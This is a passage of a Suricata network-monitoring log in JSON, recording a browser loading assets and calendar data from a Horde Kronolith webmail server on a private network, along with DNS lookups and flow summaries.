{"timestamp":"2020-02-29T00:12:44.458784+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:12:44.479523+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":6}} {"timestamp":"2020-02-29T00:12:44.487927+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:12:44.489034+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":7}} {"timestamp":"2020-02-29T00:12:44.492155+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:12:44.492828+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":8}} {"timestamp":"2020-02-29T00:12:44.492847+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:12:44.493398+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:12:44.493548+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} {"timestamp":"2020-02-29T00:12:44.494227+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":9}} {"timestamp":"2020-02-29T00:12:44.494337+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.494905+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.495681+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.496240+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:12:44.496257+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":10}} {"timestamp":"2020-02-29T00:12:44.496885+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:12:44.496897+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:12:44.497615+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":11}} {"timestamp":"2020-02-29T00:12:44.537309+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:12:44.545353+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:12:44.548279+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":12}} {"timestamp":"2020-02-29T00:12:44.548593+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:12:44.600798+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.634787+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.795519+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.805646+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24982,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820640+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820982+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:12:44.838775+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.958321+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56223,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:45.000735+0000","flow_id":150206485572827,"event_type":"flow","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":12,"bytes_toserver":4491,"bytes_toclient":7846,"start":"2020-02-29T00:11:35.994523+0000","end":"2020-02-29T00:11:43.053860+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001038+0000","flow_id":1202052566297535,"event_type":"flow","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":26,"pkts_toclient":25,"bytes_toserver":6852,"bytes_toclient":20641,"start":"2020-02-29T00:11:35.994239+0000","end":"2020-02-29T00:11:43.048709+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1a","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001105+0000","flow_id":1062938575886898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:11:39.383538+0000","end":"2020-02-29T00:11:44.702752+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001326+0000","flow_id":701495603006587,"event_type":"flow","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":26,"bytes_toserver":3440,"bytes_toclient":28434,"start":"2020-02-29T00:11:38.232571+0000","end":"2020-02-29T00:11:44.693708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":6}} {"timestamp":"2020-02-29T00:12:45.107378+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":972},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":15}} {"timestamp":"2020-02-29T00:12:45.107433+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137}} {"timestamp":"2020-02-29T00:12:47.000497+0000","flow_id":360397875076404,"event_type":"flow","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:46.417076+0000","end":"2020-02-29T00:07:46.525040+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:49.000552+0000","flow_id":1491464643110889,"event_type":"flow","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":852,"bytes_toclient":659,"start":"2020-02-29T00:11:43.157673+0000","end":"2020-02-29T00:11:48.161299+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:49.822840+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 